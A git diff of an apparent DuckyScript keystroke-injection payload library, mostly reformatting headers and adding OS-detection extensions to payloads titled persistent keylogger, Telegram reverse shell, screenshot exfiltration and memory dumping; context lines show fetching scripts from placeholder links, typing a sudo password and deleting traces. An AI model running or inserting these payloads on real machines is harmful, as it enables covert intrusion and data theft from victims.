+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
GUI r
DELAY 2000
diff --git a/payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt b/payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt
index 50149ba..8c6bccd 100644
--- a/payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt
+++ b/payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt
@@ -1,12 +1,14 @@
-REM ########################################################
-REM # #
-REM # Title : Persistent Keylogger - Telegram Based #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Execution #
-REM # Target : Linux #
-REM # #
-REM ########################################################
+REM_BLOCK
+########################################################
+# #
+# Title : Persistent Keylogger - Telegram Based #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+########################################################
+END_REM
REM Requirements:
REM - Internet Connection
@@ -14,7 +16,33 @@ REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
CTRL-ALT t
DELAY 2000
diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt
index 1ce3096..36ef494 100644
--- a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt
+++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt
@@ -1,12 +1,14 @@
-REM ############################################################
-REM # #
-REM # Title : Persistent Reverse Shell - Telegram Based #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Execution #
-REM # Target : Linux #
-REM # #
-REM ############################################################
+REM_BLOCK
+############################################################
+# #
+# Title : Persistent Reverse Shell - Telegram Based #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+############################################################
+END_REM
REM Requirements:
REM - Internet Connection
@@ -14,7 +16,33 @@ REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
CTRL-ALT t
DELAY 2000
diff --git a/payloads/library/execution/SendEmailThroughThunderbird/payload.txt b/payloads/library/execution/SendEmailThroughThunderbird/payload.txt
index c2dd218..457de69 100644
--- a/payloads/library/execution/SendEmailThroughThunderbird/payload.txt
+++ b/payloads/library/execution/SendEmailThroughThunderbird/payload.txt
@@ -1,13 +1,14 @@
-REM ########################################################
-REM # |
-REM # Title : Send Email Through Thunderbird |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 - Linux(debian tested) |
-REM # |
-REM ########################################################
-
+REM_BLOCK
+########################################################
+# #
+# Title : Send Email Through Thunderbird #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 - Linux(debian tested) #
+# #
+########################################################
+END_REM
REM Requirements:
REM - Internet Connection
diff --git a/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt b/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt
index 0e82f52..831f1d0 100644
--- a/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt
+++ b/payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt
@@ -1,22 +1,64 @@
-REM ############################################################
-REM # |
-REM # Title : Send Messages In Discord Channel-Server |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM ############################################################
-
+REM_BLOCK
+############################################################
+# #
+# Title : Send Messages In Discord Channel-Server #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11 #
+# #
+############################################################
+END_REM
REM Requirements:
REM - Internet connection
REM - Discord Installed
-
REM If, for example, the server is Hak5 and the channel in which you want to send the message is called usb-rubber-ducky then you should write just usb-rubber-ducky
DEFINE #CHAT_NAME example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Discord app
GUI
diff --git a/payloads/library/execution/SetArbitraryVPN_Linux/payload.txt b/payloads/library/execution/SetArbitraryVPN_Linux/payload.txt
index 1cd8718..f29cf08 100644
--- a/payloads/library/execution/SetArbitraryVPN_Linux/payload.txt
+++ b/payloads/library/execution/SetArbitraryVPN_Linux/payload.txt
@@ -1,13 +1,14 @@
-
-REM ####################################
-REM # |
-REM # Title : Set Arbitrary VPN |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Linux |
-REM # |
-REM ####################################
+REM_BLOCK
+####################################
+# #
+# Title : Set Arbitrary VPN #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+####################################
+END_REM
REM Requirements:
REM - Permissions
@@ -15,44 +16,57 @@ REM - Internet Connection
REM - 'openvpn' installed
REM REQUIRED: You need to know the sudo password and replace 'example' with this
-DEFINE SUDO_PASS example
+DEFINE #SUDO_PASS example
REM REQUIRED: Set your VPN file configuration replacing example.com with your own link
-DEFINE VPN_FILE_LINK example.com
+DEFINE #VPN_FILE_LINK example.com
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
-DELAY 1000
CTRL-ALT t
DELAY 2000
-
REM #### PERMISSIONS SECTION ####
-
-
-STRING sudo su
-ENTER
+STRINGLN sudo su
DELAY 1000
-STRING SUDO_PASS
-ENTER
+STRINGLN #SUDO_PASS
DELAY 1000
-
REM #### VPN SECTION ####
-
-
-STRING curl
-STRING VPN_FILE_LINK
-STRING > vpn_configuration.ovpn
-ENTER
+STRINGLN curl #VPN_FILE_LINK > vpn_configuration.ovpn
REM It depends by the internet connection
DELAY 2000
-STRING openvpn vpn_configuration.ovpn
+STRINGLN openvpn vpn_configuration.ovpn
REM It depends by the computer power
DELAY 2000
-
REM #### REMOVE TRACES ####
-
-
STRING rm vpn_configuration.ovpn
ENTER
DELAY 500
diff --git a/payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt b/payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt
index 1c690de..3ac3507 100644
--- a/payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt
+++ b/payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt
@@ -1,12 +1,12 @@
REM_BLOCK
################################################################
-# |
-# Title : Set An Arbitrary And Persistent Tor Circuit |
-# Author : Aleff |
-# Version : 1.0 |
-# Category : Execution |
-# Target : Windows 10/11; Linux; |
-# |
+# #
+# Title : Set An Arbitrary And Persistent Tor Circuit #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11; Linux; #
+# #
################################################################
Requirements:
diff --git a/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt b/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt
index 2c29325..db55616 100644
--- a/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt
+++ b/payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt
@@ -1,24 +1,65 @@
-REM ########################################################
-REM # |
-REM # Title : Set An Arbitrary DNS (IPv4 version) |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 11 |
-REM # |
-REM ########################################################
-
+REM_BLOCK
+########################################################
+# #
+# Title : Set An Arbitrary DNS (IPv4 version) #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 11 #
+# #
+########################################################
+END_REM
REM Requirements:
REM - Nothing
-
REM DNS IPv4 like Cloudflare DNS 1.1.1.1
DEFINE DNS example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Settings
-DELAY 1000
GUI
DELAY 1000
STRING settings
diff --git a/payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt b/payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt
index fca7921..5718b92 100644
--- a/payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt
+++ b/payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt
@@ -1,12 +1,14 @@
-REM ###################################
-REM # |
-REM # Title : Set Tor Bridge |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM ###################################
+REM_BLOCK
+###################################
+# #
+# Title : Set Tor Bridge #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+###################################
+END_REM
REM Requirements:
REM - Tor installed
diff --git a/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt b/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt
index 9935c89..bba8865 100644
--- a/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt
+++ b/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt
@@ -1,17 +1,61 @@
-REM ####################################################################################
-REM # |
-REM # Title : Starting a PowerShell with administrator permissions in Windows |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM ####################################################################################
+REM_BLOCK
+####################################################################################
+# #
+# Title : Starting a PowerShell with administrator permissions in Windows #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11 #
+# #
+####################################################################################
+END_REM
REM Requirements:
REM - Nothing
-DELAY 1000
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI x
DELAY 500
STRING a
diff --git a/payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt b/payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt
index dbdc29d..178f3b1 100644
--- a/payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt
+++ b/payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt
@@ -1,28 +1,68 @@
-
-REM #####################################################
-REM # |
-REM # Title : Stop A Single Process In Windows |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM #####################################################
-
+REM_BLOCK
+#####################################################
+# #
+# Title : Stop A Single Process In Windows #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+#####################################################
+END_REM
REM Requirements:
REM - Nothing
-
REM Write the name of the process that you want to stop
DEFINE PROCESS_NAME example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Task Manager
GUI
DELAY 1000
-STRING Task Manager
-ENTER
+STRINGLN Task Manager
DELAY 1000
REM Goto search bar
@@ -36,9 +76,7 @@ TAB
DELAY 500
REM Write the process name
-STRING PROCESS_NAME
-DELAY 500
-ENTER
+STRINGLN PROCESS_NAME
DELAY 500
TAB
DELAY 500
diff --git a/payloads/library/execution/Telegram_Persistent_Connection_Linux/payload.txt b/payloads/library/execution/Telegram_Persistent_Connection_Linux/payload.txt
index 0d4958d..b3738e8 100644
--- a/payloads/library/execution/Telegram_Persistent_Connection_Linux/payload.txt
+++ b/payloads/library/execution/Telegram_Persistent_Connection_Linux/payload.txt
@@ -1,12 +1,14 @@
-REM #######################################################
-REM # |
-REM # Title : Telegram Persistent Connection Linux |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Linux |
-REM # |
-REM #######################################################
+REM_BLOCK
+#######################################################
+# #
+# Title : Telegram Persistent Connection Linux #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+#######################################################
+END_REM
REM Requirements:
REM - Internet Connection
@@ -14,7 +16,34 @@ REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
diff --git a/payloads/library/execution/UninstallSignal/payload.txt b/payloads/library/execution/UninstallSignal/payload.txt
index 9006fba..9beced9 100644
--- a/payloads/library/execution/UninstallSignal/payload.txt
+++ b/payloads/library/execution/UninstallSignal/payload.txt
@@ -1,12 +1,14 @@
-REM #####################################
-REM # |
-REM # Title : Uninstall Signal |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM #####################################
+REM_BLOCK
+#####################################
+# #
+# Title : Uninstall Signal #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11 #
+# #
+#####################################
+END_REM
REM Plug-And-Play <3
@@ -14,11 +16,52 @@ REM Requirements:
REM - Signal App installed
REM - ExecutionPolicy Bypass
-DELAY 2000
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI r
DELAY 1000
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 2000
STRINGLN Stop-Process -Name "Signal"
diff --git a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md
index 826bc0c..60bb2ac 100644
--- a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md
+++ b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md
@@ -36,17 +36,11 @@ In addition to legal implications, **unauthorized removal of an application can
Github
-
-
-
-
- Instagram
- |
- Discord
+ Linkedin
|
diff --git a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt
index 67f6dbd..07366cf 100644
--- a/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt
+++ b/payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt
@@ -1,12 +1,14 @@
-REM ##############################################################################
-REM # |
-REM # Title : Uninstall A Specific App On Windows Through Control Panel |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM ##############################################################################
+REM_BLOCK
+##############################################################################
+# #
+# Title : Uninstall A Specific App On Windows Through Control Panel #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+##############################################################################
+END_REM
REM Requirements:
REM - The application you want to uninstall must be installed on the target (?obvious right? ^^)
@@ -17,15 +19,55 @@ REM - Payload tested on Windows 11 Eng
REM Set the exact name of the application as it appears within the control panel. Do not assume that just because an application is known by a certain name then it will have exactly that name, e.g. `Firefox` shows up again as `Mozilla Firefox (x64 en)`
DEFINE #APP_NAME example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Windows research
-DELAY 2000
GUI
DELAY 1000
REM Search and opern explorer app
-STRING explorer
-ENTER
+STRINGLN explorer
DELAY 1000
REM Goto search bar and open "Uninstall or change a program" page
diff --git a/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt b/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt
index 63282c8..d7c5910 100644
--- a/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt
+++ b/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt
@@ -1,18 +1,18 @@
-REM ########################################################
-REM # #
-REM # Title : Dump Windows Memory Through ProcDump #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Exfiltration #
-REM # Target : Windows #
-REM # #
-REM ########################################################
-
+REM_BLOCK
+########################################################
+# #
+# Title : Dump Windows Memory Through ProcDump #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows #
+# #
+########################################################
+END_REM
REM Requirements:
REM - Authorization to execute powershell commands
-
REM You must change it to 'procdump' if you want to use procdump.exe instead of procdump64a.exe
DEFINE #WHAT_EXE_DO_YOU_WANT_TO_USE procdump64a
diff --git a/payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt b/payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt
index 05ee6f0..6f6e6f6 100644
--- a/payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt
+++ b/payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt
@@ -1,13 +1,12 @@
-REM ###################################################
-REM # |
-REM # Title : Exfiltrate Computer Screenshots |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltrate |
-REM # Target : Windows 10-11 |
-REM # |
-REM ###################################################
-
+###################################################
+# #
+# Title : Exfiltrate Computer Screenshots #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltrate #
+# Target : Windows 10-11 #
+# #
+###################################################
REM Requirements:
REM - Internet Connection
@@ -15,12 +14,53 @@ REM - Discord Webhook (or whatever you want for the exfiltration)
REM - ExecutionPolicy Bypass
REM - Python
-
REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com
-DELAY 1000
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
